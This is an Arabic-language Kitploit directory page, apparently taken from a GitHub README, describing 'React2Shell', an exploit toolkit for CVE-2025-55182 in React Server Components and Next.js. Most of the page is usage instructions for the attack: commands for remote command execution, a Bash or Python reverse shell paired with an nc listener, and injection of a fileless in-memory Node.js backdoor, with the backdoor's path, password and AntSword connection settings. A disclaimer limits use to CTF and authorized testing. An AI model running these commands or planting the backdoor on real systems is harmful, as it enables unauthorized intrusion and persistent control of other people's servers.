Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182-Toolbox | Kitploit
أدوات/GitHubGitHub/lamaper/cve-2025-55182-toolbox
آليات الاستمراريةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالCTFاختبار الاختراقالقيادة والسيطرةالفريق الأحمرتطوير الحمولات
GitHublamaper/cve-2025-55182-toolbox

CVE-2025-55182-Toolbox

عرض المستودع
1منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

React2Shell: CVE-2025-55182 أداة استغلال شاملة

المؤلف: lamaper / BITs2Sys

الإصدار: 1.0.1

الترخيص: MIT

📝 نبذة عن الأداة

هذه الأداة هي أداة اختبار اختراق آلية مصممة خصيصًا لثغرة CVE-2025-55182 (تلوث سلسلة النماذج الأولية في React Server Components / Next.js المؤدي إلى RCE). صُممت الأداة خصيصًا لمسابقات CTF ومشاريع الخدمات الأمنية المصرح بها، وتجمع بين عدة وظائف مثل التحقق من الثغرات، وفحص الاتصال بالشبكة الخارجية، وإنشاء قشرة عكسية، وحقن الحصان المقيم في الذاكرة.

🚀 الوظائف الأساسية

  • تنفيذ الأوامر بضغطة واحدة (--cmd): يستخدم آلية الاستثناء NEXT_REDIRECT لإرجاع نتائج تنفيذ الأوامر المشفرة بـ Base64 بدقة.
  • فحص حالة الاتصال بالشبكة الخارجية (--check-outbound): يختبر تلقائيًا قدرة الهدف على الوصول إلى DNS وHTTP وICMP، مما يساعد في تحديد مسار الهجوم.
  • قشرة عكسية تفاعلية (--shell): تتضمن وضعي القشرة العكسية Bash وPython3، وتدعم التنفيذ غير المتزامن لمنع تعليق طلبات HTTP.
  • حصان مقيم دائم في الذاكرة (--inject-ms): يقوم بحقن حصان مقيم في الذاكرة عبر اختطاف آلية توزيع الأحداث في http.Server الخاص بـ Node.js، دون ترك أي ملفات على القرص، ويدعم التحكم المستمر.
  • واجهة تفاعل الحصان المقيم (--ms-cmd): وضع تفاعل مستقل عن مسار استغلال الثغرة، يمكنك من تنفيذ الأوامر مباشرة عبر الباب الخلفي بعد نجاح الحقن.

🛠️ التثبيت والاعتماديات

هذه الأداة مبنية على Python 3، وتتطلب فقط تثبيت مكتبة requests.

root@kitploit:~
pip install requests

📖 دليل الاستخدام

0. التحقق من وجود الثغرة

https://github.com/assetnote/react2shell-scanner هو أداة فحص مفيدة جدًا

1. تنفيذ الأوامر الأساسية

احصل على معلومات الهدف مباشرة:

root@kitploit:~
python exploit.py --url http://target.com/ --cmd "id"
python exploit.py --url http://target.com/ --cmd "cat /flag"

2. فحص الاتصال بالشبكة الخارجية

قبل محاولة إنشاء قشرة عكسية، تأكد من قدرة الهدف على الاتصال بالإنترنت الخارجي:

root@kitploit:~
python exploit.py --url http://target.com/ --check-outbound

3. القشرة العكسية

وضع Bash:

root@kitploit:~
# 攻击机执行监听: nc -lvnp 4444
python exploit.py --url http://target.com/ --shell bash --ip <你的IP> --port 4444

وضع Python:

root@kitploit:~
python exploit.py --url http://target.com/ --shell python --ip <你的IP> --port 4444

4. استغلال الحصان المقيم في الذاكرة (الاستمرارية)

حقن الحصان المقيم في الذاكرة:

root@kitploit:~
python exploit.py --url http://target.com/ --inject-ms

تنفيذ الأوامر عبر الحصان المقيم (يُستخدم بعد نجاح الحقن):

root@kitploit:~
python exploit.py --url http://target.com/ --ms-cmd "whoami"

ملاحظة: المسار الافتراضي لتركيب الحصان المقيم هو /?pass، ويتم التشغيل بإرسال المعامل pwd عبر POST.

الاتصال عبر أداة AntSword:

كلمة مرور الاتصال: pwd، طريقة الاتصال: CMDLINUX

⚠️ إخلاء المسؤولية

تُستخدم هذه الأداة فقط في النطاق المسموح به قانونًا لأغراض البحث الأمني ومسابقات CTF واختبارات الاختراق المصرح بها. يُحظر تمامًا استخدامها في الهجمات غير القانونية. يتحمل المستخدم كامل المسؤولية عن أي عواقب تنجم عن استخدام هذه الأداة.


تنزيل الأداة